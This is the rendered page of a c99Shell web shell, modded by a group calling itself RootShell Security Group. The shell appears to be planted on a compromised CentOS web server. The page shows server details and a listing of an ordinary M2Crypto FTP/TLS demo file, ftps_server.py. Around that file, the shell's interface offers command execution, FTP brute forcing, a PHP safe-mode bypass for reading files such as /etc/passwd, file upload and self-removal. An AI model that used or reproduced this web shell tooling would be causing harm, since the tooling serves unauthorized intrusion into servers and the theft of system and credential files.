!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/m2crypto-0.16/demo/medusa/   drwxr-xr-x
Free 50.89 GB of 127.8 GB (39.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ftps_server.py (14.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"""An FTP/TLS server built on Medusa's ftp_server. 

Copyright (c) 1999-2003 Ng Pheng Siong. All rights reserved."""

# Python
import socket, string, sys, time

# Medusa
from counter import counter
import asynchat, asyncore, ftp_server, logger

# M2Crypto
from M2Crypto import SSL

VERSION_STRING='0.09'

class ftp_tls_channel(ftp_server.ftp_channel):
    
    """FTP/TLS server channel for Medusa."""

    def __init__(self, server, ssl_ctx, conn, addr):
        """Initialise the channel."""
        self.ssl_ctx = ssl_ctx
        self.server = server
        self.current_mode = 'a'
        self.addr = addr
        asynchat.async_chat.__init__(self, conn)
        self.set_terminator('\r\n')
        self.client_addr = (addr[0], 21)
        self.client_dc = None
        self.in_buffer = ''
        self.closing = 0
        self.passive_acceptor = None
        self.passive_connection = None
        self.filesystem = None
        self.authorized = 0
        self._ssl_accepting = 0
        self._ssl_accepted = 0
        self._pbsz = None
        self._prot = None
        resp = '220 %s M2Crypto (Medusa) FTP/TLS server v%s ready.'
        self.respond(resp % (self.server.hostname, VERSION_STRING))

    def writable(self):
        return self._ssl_accepting or self._ssl_accepted

    def handle_read(self):
        """Handle a read event."""
        if self._ssl_accepting:
            self._ssl_accepted = self.socket.accept_ssl()
            if self._ssl_accepted:
                self._ssl_accepting = 0
        else:
            try:
                ftp_server.ftp_channel.handle_read(self) 
            except SSL.SSLError, what:
                if str(what) == 'unexpected eof':
                    self.close()
                else:
                    raise

    def handle_write(self):
        """Handle a write event."""
        if self._ssl_accepting:
            self._ssl_accepted = self.socket.accept_ssl()
            if self._ssl_accepted:
                self._ssl_accepting = 0
        else:
            try:
                ftp_server.ftp_channel.handle_write(self) 
            except SSL.SSLError, what:
                if str(what) == 'unexpected eof':
                    self.close()
                else:
                    raise

    def send(self, data):
        """Send data over SSL."""
        try:
            result = self.socket.send(data)
            if result <= 0:
                return 0
            else:
                return result
        except SSL.SSLError, what:
            self.close()
            self.log_info('send: closing channel %s %s' % (repr(self), what))
            return 0

    def recv(self, buffer_size):
        """Receive data over SSL."""
        try:
            result = self.socket.recv(buffer_size)
            if not result:
                return ''
            else:
                return result
        except SSL.SSLError, what:
            self.close()
            self.log_info('recv: closing channel %s %s' % (repr(self), what))
            return ''

    def found_terminator(self):
        """Dispatch the FTP command."""
        line = self.in_buffer
        if not len(line):
            return

        sp = string.find(line, ' ')
        if sp != -1:
            line = [line[:sp], line[sp+1:]]
        else:
            line = [line]

        command = string.lower(line[0])
        if string.find(command, 'stor') != -1:
            while command and command[0] not in string.letters:
                command = command[1:]
        
        func_name = 'cmd_%s' % command
        if command != 'pass':
            self.log('<== %s' % repr(self.in_buffer)[1:-1])
        else:
            self.log('<== %s' % line[0]+' <password>')

        self.in_buffer = ''
        if not hasattr(self, func_name):
            self.command_not_understood(line[0])
            return 
    
        func = getattr(self, func_name)
        if not self.check_command_authorization(command):
            self.command_not_authorized(command)
        else:
            try:
                result = apply(func, (line,))
            except:
                self.server.total_exceptions.increment()
                (file, func, line), t, v, tbinfo = asyncore.compact_traceback()
                if self.client_dc:
                    try:
                        self.client_dc_close()
                    except:
                        pass
                resp = '451 Server error: %s, %s: file %s line: %s'
                self.respond(resp % (t, v, file, line))

    def make_xmit_channel(self):
        """Create a connection for sending data."""
        pa = self.passive_acceptor
        if pa:
            if pa.ready:
                conn, addr = pa.ready
                if self._prot:
                    cdc = tls_xmit_channel(self, conn, self.ssl_ctx, addr)
                else:
                    cdc = ftp_server.xmit_channel(self, addr)
                    cdc.set_socket(conn)
                cdc.connected = 1
                self.passive_acceptor.close()
                self.passive_acceptor = None
            else:
                if self._prot:
                    cdc = tls_xmit_channel(self, None, self.ssl_ctx, None)
                else:
                    cdc = ftp_server.xmit_channel(self)
        else:
            if self._prot:
                cdc = tls_xmit_channel(self, None, self.ssl_ctx, self.client_addr)
            else:
                cdc = ftp_server.xmit_channel(self, self.client_addr)
            cdc.create_socket(socket.AF_INET, socket.SOCK_STREAM)
            if self.bind_local_minus_one:
                cdc.bind(('', self.server.port - 1))
            try:
                cdc.connect(self.client_addr)
            except socket.error, what:
                self.respond('425 Cannot build data connection')
        self.client_dc = cdc

    def make_recv_channel(self, fd):
        """Create a connection for receiving data."""
        pa = self.passive_acceptor
        if pa:
            if pa.ready:
                conn, addr = pa.ready
                if self._prot:
                    cdc = tls_recv_channel(self, conn, self.ssl_ctx, addr, fd)
                else:
                    cdc = ftp_server.recv_channel(self, addr, fd)
                cdc.set_socket(conn)
                cdc.connected = 1
                self.passive_acceptor.close()
                self.passive_acceptor = None
            else:
                if self._prot:
                    cdc = tls_recv_channel(self, None, self.ssl_ctx, None, fd)
                else:
                    cdc = ftp_server.recv_channel(self, None, fd)
        else:
            if self._prot:
                cdc = tls_recv_channel(self, None, self.ssl_ctx, self._prot, self.client_addr, fd)
            else:
                cdc = ftp_server.recv_channel(self, self.client_addr, fd)
            cdc.create_socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                cdc.connect(self.client_addr)
            except socket.error, what:
                self.respond('425 Cannot build data connection')
        self.client_dc = cdc

    def cmd_auth(self, line):
        """Prepare for TLS operation."""
        # XXX Handle variations.
        if line[1] != 'TLS':
            self.command_not_understood (string.join(line))
        else:
            self.respond('234 AUTH TLS successful')
            self._ssl_accepting = 1
            self.socket = SSL.Connection(self.ssl_ctx, self.socket)    
            self.socket.setup_addr(self.addr)
            self.socket.setup_ssl()
            self.socket.set_accept_state()
            self._ssl_accepted = self.socket.accept_ssl()
            if self._ssl_accepted:
                self._ssl_accepting = 0

    def cmd_pbsz(self, line):
        """Negotiate size of buffer for secure data transfer. For
        FTP/TLS the only valid value for the parameter is '0'; any 
        other value is accepted but ignored."""
        if not (self._ssl_accepting or self._ssl_accepted):
            return self.respond('503 AUTH TLS must be issued prior to PBSZ')
        self._pbsz = 1
        self.respond('200 PBSZ=0 successful.')

    def cmd_prot(self, line):
        """Negotiate the security level of the data connection.""" 
        if self._pbsz is None:
            return self.respond('503 PBSZ must be issued prior to PROT')
        if line[1] == 'C':
            self.respond('200 Protection set to Clear')
            self._pbsz = None
            self._prot = None
        elif line[1] == 'P': 
            self.respond('200 Protection set to Private')
            self._prot = 1
        elif line[1] in ('S', 'E'):
            self.respond('536 PROT %s unsupported' % line[1])
        else:
            self.respond('504 PROT %s unsupported' % line[1])
            

class ftp_tls_server(ftp_server.ftp_server):

    """FTP/TLS server for Medusa."""

    SERVER_IDENT = 'M2Crypto FTP/TLS Server (v%s)' % VERSION_STRING

    ftp_channel_class = ftp_tls_channel

    def __init__(self, authz, ssl_ctx, host=None, ip='', port=21, resolver=None, log_obj=None):
        """Initialise the server."""
        self.ssl_ctx = ssl_ctx
        self.ip = ip
        self.port = port
        self.authorizer = authz

        if host is None:
            self.hostname = socket.gethostname()
        else:
            self.hostname = host

        self.total_sessions = counter()
        self.closed_sessions = counter()
        self.total_files_out = counter()
        self.total_files_in = counter()
        self.total_bytes_out = counter()
        self.total_bytes_in = counter()
        self.total_exceptions = counter()

        asyncore.dispatcher.__init__(self)
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.set_reuse_addr()
        self.bind((self.ip, self.port))
        self.listen(5)

        if log_obj is None:
            log_obj = sys.stdout

        if resolver:
            self.logger = logger.resolving_logger(resolver, log_obj)
        else:
            self.logger = logger.unresolving_logger(logger.file_logger(sys.stdout))

        l = 'M2Crypto (Medusa) FTP/TLS server started at %s\n\tAuthz: %s\n\tHostname: %s\n\tPort: %d'
        self.log_info(l % (time.ctime(time.time()), repr(self.authorizer), self.hostname, self.port))

    def handle_accept(self):
        """Accept a socket and dispatch a channel to handle it."""
        conn, addr = self.accept()
        self.total_sessions.increment()
        self.log_info('Connection from %s:%d' % addr)
        self.ftp_channel_class(self, self.ssl_ctx, conn, addr)


class nbio_ftp_tls_actor:

    """TLS protocol negotiation mixin for FTP/TLS."""

    def tls_init(self, sock, ssl_ctx, client_addr):
        """Perform TLS protocol negotiation."""
        self.ssl_ctx = ssl_ctx
        self.client_addr = client_addr
        self._ssl_handshaking = 1
        self._ssl_handshake_ok = 0
        if sock:
            self.socket = SSL.Connection(self.ssl_ctx, sock)
            self.socket.setup_addr(self.client_addr)
            self.socket.setup_ssl()
            self._ssl_handshake_ok = self.socket.accept_ssl()
            if self._ssl_handshake_ok:
                self._ssl_handshaking = 0
            self.add_channel()
        # else the client hasn't connected yet; when that happens,
        # handle_connect() will be triggered.

    def tls_neg_ok(self):
        """Return status of TLS protocol negotiation."""
        if self._ssl_handshaking:
            self._ssl_handshake_ok = self.socket.accept_ssl()
            if self._ssl_handshake_ok:
                self._ssl_handshaking = 0
        return self._ssl_handshake_ok

    def handle_connect(self):
        """Handle a data connection that occurs after this instance came 
        into being. When this handler is triggered, self.socket has been 
        created and refers to the underlying connected socket."""
        self.socket = SSL.Connection(self.ssl_ctx, self.socket)
        self.socket.setup_addr(self.client_addr)
        self.socket.setup_ssl()
        self._ssl_handshake_ok = self.socket.accept_ssl()
        if self._ssl_handshake_ok:
            self._ssl_handshaking = 0
        self.add_channel()

    def send(self, data):
        """Send data over SSL."""
        try:
            result = self.socket.send(data)
            if result <= 0:
                return 0
            else:
                return result
        except SSL.SSLError, what:
            self.close()
            self.log_info('send: closing channel %s %s' % (repr(self), what))
            return 0

    def recv(self, buffer_size):
        """Receive data over SSL."""
        try:
            result = self.socket.recv(buffer_size)
            if not result:
                return ''
            else:
                return result
        except SSL.SSLError, what:
            self.close()
            self.log_info('recv: closing channel %s %s' % (repr(self), what))
            return ''
 

class tls_xmit_channel(nbio_ftp_tls_actor, ftp_server.xmit_channel):

    """TLS driver for a send-only data connection."""

    def __init__(self, channel, conn, ssl_ctx, client_addr=None):
        """Initialise the driver."""
        ftp_server.xmit_channel.__init__(self, channel, client_addr)
        self.tls_init(conn, ssl_ctx, client_addr)

    def readable(self):
        """This channel is readable iff TLS negotiation is in progress.
        (Which implies a connected channel, of course.)"""
        if not self.connected:
            return 0
        else:
            return self._ssl_handshaking

    def writable(self):
        """This channel is writable iff TLS negotiation is in progress
        or the application has data to send."""
        if self._ssl_handshaking:
            return 1
        else:
            return ftp_server.xmit_channel.writable(self)

    def handle_read(self):
        """Handle a read event: either continue with TLS negotiation
        or let the application handle this event."""
        if self.tls_neg_ok():
            ftp_server.xmit_channel.handle_read(self) 

    def handle_write(self):
        """Handle a write event: either continue with TLS negotiation
        or let the application handle this event."""
        if self.tls_neg_ok():
            ftp_server.xmit_channel.handle_write(self) 


class tls_recv_channel(nbio_ftp_tls_actor, ftp_server.recv_channel):
    
    """TLS driver for a receive-only data connection."""

    def __init__(self, channel, conn, ssl_ctx, client_addr, fd):
        """Initialise the driver."""
        ftp_server.recv_channel.__init__(self, channel, client_addr, fd)
        self.tls_init(conn, ssl_ctx, client_addr)

    def writable(self):
        """This channel is writable iff TLS negotiation is in progress."""
        return self._ssl_handshaking

    def handle_read(self):
        """Handle a read event: either continue with TLS negotiation
        or let the application handle this event."""
        if self.tls_neg_ok():
            ftp_server.recv_channel.handle_read(self) 

    def handle_write(self):
        """Handle a write event: either continue with TLS negotiation
        or let the application handle this event."""
        if self.tls_neg_ok():
            ftp_server.recv_channel.handle_write(self) 



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0172 ]--